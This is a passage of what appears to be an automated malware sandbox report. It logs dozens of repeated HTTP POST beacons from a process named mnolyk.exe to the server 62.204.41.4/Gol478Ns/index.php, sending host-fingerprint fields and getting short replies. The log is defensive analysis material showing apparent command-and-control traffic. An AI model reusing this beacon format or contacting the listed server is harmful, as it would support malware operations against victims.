                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:44.321942091 CET1082INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      616192.168.2.75034562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:44.689332962 CET1083OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:44.752979994 CET1083INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      617192.168.2.75034662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:45.811034918 CET1084OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:45.879740953 CET1084INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      618192.168.2.75034762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:46.051188946 CET1085OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:46.121114969 CET1085INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      619192.168.2.75034862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:46.302644014 CET1086OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:46.366266012 CET1086INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      62192.168.2.74978762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:12.665966988 CET500OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.728543043 CET501INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      620192.168.2.75034962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:46.552442074 CET1087OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:46.616745949 CET1087INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      621192.168.2.75035062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:46.836121082 CET1088OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:46.900326967 CET1088INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      622192.168.2.75035162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:47.071029902 CET1089OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:47.136858940 CET1089INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      623192.168.2.75035262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:47.330598116 CET1090OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:47.395271063 CET1090INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      624192.168.2.75035362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:47.570343971 CET1091OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:47.638125896 CET1091INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      625192.168.2.75035462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:47.820986986 CET1092OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:47.885979891 CET1092INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      626192.168.2.75035562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:48.066555977 CET1093OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:48.132057905 CET1093INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      627192.168.2.75035662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:48.308768034 CET1094OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:48.374762058 CET1094INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      628192.168.2.75035762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:48.553890944 CET1095OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:48.617072105 CET1095INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      629192.168.2.75035862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:48.804090977 CET1096OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:48.866875887 CET1096INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      63192.168.2.74978862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:12.897780895 CET501OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:12.961004972 CET502INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      630192.168.2.75035962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:49.036581039 CET1097OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:49.107068062 CET1097INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      631192.168.2.75036062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:49.288881063 CET1098OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:49.354939938 CET1098INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      632192.168.2.75036162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:49.540296078 CET1099OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:49.603307009 CET1099INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
